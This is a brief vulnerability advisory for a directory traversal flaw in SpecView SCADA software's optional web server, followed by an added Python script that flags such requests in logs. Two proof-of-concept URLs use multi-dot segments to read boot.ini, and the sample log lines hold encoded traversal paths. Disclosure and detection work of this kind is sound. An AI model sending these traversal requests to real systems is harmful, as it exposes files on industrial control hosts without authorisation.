Luigi Auriemma

Application:  SpecView
Versions:     <= 2.5 build 853
Platforms:    Windows
Bug:          web server directory traversal
Author:       Luigi Auriemma

1) Introduction
2) Bug
3) The Code
4) Fix

===============
1) Introduction
===============

SpecView is an easy to use SCADA software.

======
2) Bug
======

The software has an option (disabled by default) that runs a web server
providing an updated screenshot of the program.

This built-in web server is affected by a classical directory traversal
attack that uses path segments made of more than two dots.

===========
3) The Code
===========

http://www.2cto.com /......boot.ini
http://www.2cto.com /...\...\...\...\...\...\boot.ini

======
4) Fix
======

No fix.
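
Added example (not part of the original advisory and not SpecView code): with no fix available, requests of this kind can be flagged in proxy or front-end logs. The sketch assumes common-log-format lines; the sample lines, addresses and the names traversal_reason and scan are constructed for illustration.

```python
import re
from urllib.parse import unquote

SEP = re.compile(r"[\\/]+")        # Windows servers accept both separators
DOT_RUN = re.compile(r"\.{3,}")    # three or more consecutive dots
REQ = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) [^"]*"')

def traversal_reason(raw_path):
    """Return why a request path looks like dot traversal, or None."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):             # bounded re-decoding catches %252e forms
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    for seg in SEP.split(path):
        # "..", "..." and longer dot-only segments; a ".."-only filter
        # misses the multi-dot form this advisory describes
        if len(seg) >= 2 and set(seg) == {"."}:
            return f"dot-only segment {seg!r}"
    if DOT_RUN.search(path):
        return "run of three or more dots"
    return None

def scan(lines):
    """Return (client, path, reason) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        reason = traversal_reason(m.group(2))
        if reason:
            hits.append((m.group(1), m.group(2), reason))
    return hits

# Constructed sample log lines (documentation addresses, assumed paths).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /screenshot.jpg HTTP/1.1" 200 51234',
    r'192.0.2.77 - - [01/Jan/2012:10:00:05 +0000] "GET /...\...\...\boot.ini HTTP/1.1" 200 211',
    r'192.0.2.77 - - [01/Jan/2012:10:00:06 +0000] "GET /%2e%2e%2e/%2e%2e%2e/boot.ini HTTP/1.1" 200 211',
    r'192.0.2.10 - - [01/Jan/2012:10:00:09 +0000] "GET /images/logo.v2.png HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, path, reason in scan(SAMPLE_LOG):
        print(client, path, reason)
```

The same check, applied before the request path is mapped to a file, works as a reject rule on a reverse proxy placed in front of the built-in web server.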